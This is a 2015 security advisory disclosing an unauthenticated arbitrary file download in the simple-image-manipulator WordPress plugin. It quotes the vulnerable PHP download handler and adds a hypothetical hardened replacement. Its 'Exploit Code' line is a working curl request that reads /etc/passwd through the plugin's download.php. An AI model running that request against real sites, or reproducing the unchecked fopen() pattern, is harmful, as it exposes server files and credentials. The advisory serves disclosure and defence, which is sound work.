Advisory #: 147
Title: Arbitrary file download in simple-image-manipulator v1.0 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-16
CVE-ID:[CVE-2015-1000010]
CWE: CWE-284 Improper Access Control
Download Site: https://wordpress.org/plugins/simple-image-manipulator
Vendor: https://profiles.wordpress.org/kevartpatel/
Vendor Notified: 2015-07-16
Vendor Contact: plugins@wordpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=144
Description: Manipulate your wordpress images using slider and tickboxes.
Vulnerability:
In ./simple-image-manipulator/controller/download.php no checks are made to authenticate the user or to sanitize input when determining the file location. The script is reachable directly (it is not routed through WordPress, so no capability or nonce check applies), and the filepath request parameter is passed straight to fopen(), so any file readable by the web server process can be downloaded by an unauthenticated remote user. Because output_file() is called with a fixed 'text/plain' MIME type, the contents are returned as plain text regardless of the extension-based lookup shown below.

    function output_file($file, $name, $mime_type='')
    {
    . . .
        /* Figure out the MIME type | Check in array */
        $known_mime_types=array(
            "pdf" => "application/pdf",
            "txt" => "text/plain",
            "html" => "text/html",
            "htm" => "text/html",
            "exe" => "application/octet-stream",
            "zip" => "application/zip",
            "doc" => "application/msword",
            "xls" => "application/vnd.ms-excel",
            "ppt" => "application/vnd.ms-powerpoint",
            "gif" => "image/gif",
            "png" => "image/png",
            "jpeg"=> "image/jpg",
            "jpg" => "image/jpg",
            "php" => "text/plain"
        );

        if($mime_type==''){
            $file_extension = strtolower(substr(strrchr($file,"."),1));
            if(array_key_exists($file_extension, $known_mime_types)){
                $mime_type=$known_mime_types[$file_extension];
            } else {
                $mime_type="application/force-download";
            };
        };
    . . .
        if ($file = fopen($file, 'r'))
        {
            if(isset($_SERVER['HTTP_RANGE']))
                fseek($file, $range);

            while(!feof($file) &&
                  (!connection_aborted()) &&
                  ($bytes_send<$new_length)
                 )
            {
                $buffer = fread($file, $chunksize);
                print($buffer); //echo($buffer); // can also possible
                flush();
                $bytes_send += strlen($buffer);
            }
            fclose($file);
        } else
            //If no permission
            die('Error - can not open file.');
        //die
        die();
    }
    //Set the time out
    set_time_limit(0);


    //Call the download function with file path,file name and file type
    output_file($_REQUEST['filepath'], ''.$_REQUEST['filename'].'', 'text/plain');
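The following is an added example of how a download endpoint like this one can be hardened. It is not the vendor's code or a patch from the plugin; it is a hypothetical replacement handler written for this advisory. It assumes the intended behaviour is to let logged-in users who may upload files fetch a file from the WordPress uploads directory by bare filename, and it routes the request through admin-post.php so that the WordPress authentication, capability and nonce checks apply. The hook name sim_download, the function names and the nonce action are all assumptions.

```php
<?php
// Added example, not the plugin's code. Hardened replacement for a
// download endpoint that previously passed $_REQUEST['filepath'] to fopen().
// Assumptions: only users with the upload_files capability may download,
// and only files that live directly in the WordPress uploads directory.

add_action('admin_post_sim_download', 'sim_hardened_download'); // hypothetical action name

/**
 * Resolve $requested to a real file inside $base, or return null.
 * Only the basename of the request is used, so "../" sequences and
 * absolute paths such as /etc/passwd never reach the filesystem.
 */
function sim_resolve_within(string $base, string $requested): ?string {
    if (strpos($requested, "\0") !== false) {
        return null; // NUL byte: never a legitimate filename
    }
    $base_real = realpath($base);
    if ($base_real === false) {
        return null;
    }
    $prefix    = rtrim($base_real, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    $candidate = realpath($prefix . basename($requested));
    if ($candidate === false) {
        return null; // does not exist
    }
    // Belt and braces: realpath() also follows symlinks, so confirm the
    // resolved target still lies under the uploads directory.
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return is_file($candidate) ? $candidate : null;
}

function sim_hardened_download(): void {
    // 1. Authentication and authorisation (the original performed neither).
    if (!is_user_logged_in() || !current_user_can('upload_files')) {
        wp_die('Forbidden', 403);
    }

    // 2. CSRF protection: the link must carry a nonce for this action.
    check_admin_referer('sim_download'); // nonce action name is an assumption

    // 3. Path confinement: bare filename, inside the uploads directory only.
    $uploads = wp_upload_dir();
    $file    = sim_resolve_within($uploads['basedir'], (string) ($_GET['filename'] ?? ''));
    if ($file === null) {
        wp_die('Not found', 404);
    }

    // 4. Content type derived from the file name WordPress already allows,
    //    falling back to a generic binary type rather than text/plain.
    $type = wp_check_filetype(basename($file));
    $mime = $type['type'] ? $type['type'] : 'application/octet-stream';

    nocache_headers();
    header('Content-Type: ' . $mime);
    header('Content-Length: ' . filesize($file));
    header('Content-Disposition: attachment; filename="' . basename($file) . '"');
    header('X-Content-Type-Options: nosniff');
    readfile($file);
    exit;
}
```

A download link for this handler would be generated with wp_nonce_url(admin_url('admin-post.php?action=sim_download&filename=example.png'), 'sim_download'). With this in place the advisory's request for filepath=/etc/passwd fails three times over: the unauthenticated request never reaches the hook, the nonce check rejects it, and basename() reduces any traversal or absolute path to a name that is looked up only inside the uploads directory.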
Exploit Code:
  1. curl -sk "http://www.vapidlabs.com/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd"
Screen Shots:
Notes: